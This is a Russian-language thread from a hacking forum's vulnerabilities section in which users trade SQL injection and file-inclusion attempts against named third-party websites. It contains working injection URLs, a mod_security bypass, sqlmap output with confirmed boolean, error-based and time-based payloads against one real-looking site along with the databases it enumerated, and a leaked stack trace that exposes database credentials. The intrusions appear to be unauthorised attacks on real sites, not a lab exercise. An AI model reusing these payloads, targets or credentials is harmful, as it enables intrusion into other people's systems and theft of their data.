HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.08.2016, 15:13
pw0ned
Участник форума
Регистрация: 08.01.2016
Сообщений: 118
С нами: 5445686

Репутация: 14
По умолчанию

Цитата:
Сообщение от MaxxWell  

http://sirus.su/in.php
Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.
LFI через phpinfo() разве что.

но нужен инклуд.
 
Ответить с цитированием

  #2  
Старый 26.08.2016, 15:38
MaxxWell
Познающий
Регистрация: 05.01.2016
Сообщений: 31
С нами: 5450006

Репутация: 0
По умолчанию

Цитата:
Сообщение от pw0ned  

LFI через phpinfo() разве что.
но нужен инклуд.
А где ж его взять то?))
 
Ответить с цитированием

  #3  
Старый 26.08.2016, 16:47
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Имеется сайт site.ru/ajax/Areas/Product/

Если в cookies поставить ' в timezone, то выдает следующее:

.SpoilerTarget" type="button">Spoiler: Ответ HTTP 500:

Код:
Exception Object
(
    [message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (')
    [string:Exception:private] =>
    [code:protected] => 0
    [file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
    [line:protected] => 164
    [trace:Exception:private] => Array
        (
            [0] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                    [line] => 164
                    [function] => __construct
                    [class] => DateTimeZone
                    [type] => ->
                    [args] => Array
                        (
                            [0] => '
                        )

                )

            [1] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                    [line] => 141
                    [function] => checkConnect
                    [class] => MYSQL_DB
                    [type] => ->
                    [args] => Array
                        (
                        )

                )

            [2] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                    [line] => 74
                    [function] => __construct
                    [class] => MYSQL_DB
                    [type] => ->
                    [args] => Array
                        (
                            [0] => site_work
                            [1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ
                            [2] => satom
                            [3] => 127.0.0.1
                            [4] => 3307
                        )

                )

            [3] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php
                    [line] => 75
                    [function] => DB
                    [class] => MYSQL_DB
                    [type] => ::
                    [args] => Array
                        (
                        )

                )

            [4] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php
                    [line] => 22
                    [function] => __construct
                    [class] => DefaultModel
                    [type] => ->
                    [args] => Array
                        (
                            [0] => mail_queue
                        )

                )

            [5] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php
                    [line] => 39
                    [function] => __construct
                    [class] => MailQueueModel
                    [type] => ->
                    [args] => Array
                        (
                        )

                )

            [6] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php
                    [line] => 56
                    [function] => send
                    [class] => QueueMailer
                    [type] => ->
                    [args] => Array
                        (
                            [0] => errors@site.com
                            [1] => Timezone Error
                            [2] =>
Здесь может быть sql-injection или это просто вывод ошибки такой?
 
Ответить с цитированием

  #4  
Старый 26.08.2016, 16:52
MaxxWell
Познающий
Регистрация: 05.01.2016
Сообщений: 31
С нами: 5450006

Репутация: 0
По умолчанию

Как подобрать если не выводит кол-во?

Код:
http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
 
Ответить с цитированием

  #5  
Старый 26.08.2016, 17:48
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Цитата:
Сообщение от MaxxWell  

Как подобрать если не выводит кол-во?
Код:
http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
Попробуй другой URL))

Код:
http://www.premium-network.ru/index.php?id=add&used=faq&s=3
.SpoilerTarget" type="button">Spoiler: подсказка

Код:
---
Parameter: s (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=add&used=faq&s=3' AND 9304=9304 AND 'HJyF'='HJyF

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=add&used=faq&s=3' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(3147=3147,1))),0x7171786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xSeN'='xSeN

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=add&used=faq&s=3' AND SLEEP(5) AND 'PmOg'='PmOg
---

web server operating system: FreeBSD
web application technology: PHP 5.4.26, Apache 2.2.27
back-end DBMS: MySQL >= 5.5
banner:    '5.5.37'
current user:    'forumpt@localhost'
current database:    'new_premium'
current user is DBA:    False
database management system users [1]:[*] 'forumpt'@'localhost'

available databases [3]:[*] forumpt[*] information_schema[*] new_premium
 
Ответить с цитированием

  #6  
Старый 26.08.2016, 17:50
pw0ned
Участник форума
Регистрация: 08.01.2016
Сообщений: 118
С нами: 5445686

Репутация: 14
По умолчанию

Цитата:
Сообщение от kacergei  

Имеется сайт site.ru/ajax/Areas/Product/
Если в cookies поставить
'
в timezone, то выдает следующее:
Spoiler: Ответ HTTP 500:
Код:
Exception Object
(
    [message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (')
    [string:Exception:private] =>
    [code:protected] => 0
    [file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
    [line:protected] => 164
    [trace:Exception:private] => Array
        (
            [0] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                    [line] => 164
                    [function] => __construct
                    [class] => DateTimeZone
                    [type] => ->
                    [args] => Array
                        (
                            [0] => '
                        )

                )

            [1] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                    [line] => 141
                    [function] => checkConnect
                    [class] => MYSQL_DB
                    [type] => ->
                    [args] => Array
                        (
                        )

                )

            [2] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                    [line] => 74
                    [function] => __construct
                    [class] => MYSQL_DB
                    [type] => ->
                    [args] => Array
                        (
                            [0] => site_work
                            [1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ
                            [2] => satom
                            [3] => 127.0.0.1
                            [4] => 3307
                        )

                )

            [3] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php
                    [line] => 75
                    [function] => DB
                    [class] => MYSQL_DB
                    [type] => ::
                    [args] => Array
                        (
                        )

                )

            [4] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php
                    [line] => 22
                    [function] => __construct
                    [class] => DefaultModel
                    [type] => ->
                    [args] => Array
                        (
                            [0] => mail_queue
                        )

                )

            [5] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php
                    [line] => 39
                    [function] => __construct
                    [class] => MailQueueModel
                    [type] => ->
                    [args] => Array
                        (
                        )

                )

            [6] => Array
                (
                    [file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php
                    [line] => 56
                    [function] => send
                    [class] => QueueMailer
                    [type] => ->
                    [args] => Array
                        (
                            [0] => errors@site.com
                            [1] => Timezone Error
                            [2] =>
Здесь может быть sql-injection или это просто вывод ошибки такой?
Ошибка скрипта вроде как.
 
Ответить с цитированием

  #7  
Старый 26.08.2016, 18:55
demafly76
Новичок
Регистрация: 14.08.2016
Сообщений: 17
С нами: 5130326

Репутация: 0
По умолчанию

Код:
http://site.ru/news-post.php?id=-1'+/*!50000Union*/+Select+1,schema_name,3,4,5,6+From+/*!information_schema.schemata+limit+0,2*/+--+sp
стоит mod_security, выводит только 1 базу, с таблицами также! добавлял limit и group_concat, таже фигня mod_security не ругается, что может быть?

version:

5.5.42-37.1-log
 
Ответить с цитированием

  #8  
Старый 26.08.2016, 22:32
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от MaxxWell  

http://sirus.su/in.php
Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.
можно исходники читать
 
Ответить с цитированием

  #9  
Старый 26.08.2016, 22:46
MaxxWell
Познающий
Регистрация: 05.01.2016
Сообщений: 31
С нами: 5450006

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  

можно исходники читать
В пм пожалуйста можешь описать в кратце как??
 
Ответить с цитированием

  #10  
Старый 27.08.2016, 02:16
MaxxWell
Познающий
Регистрация: 05.01.2016
Сообщений: 31
С нами: 5450006

Репутация: 0
По умолчанию

Всё уже.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.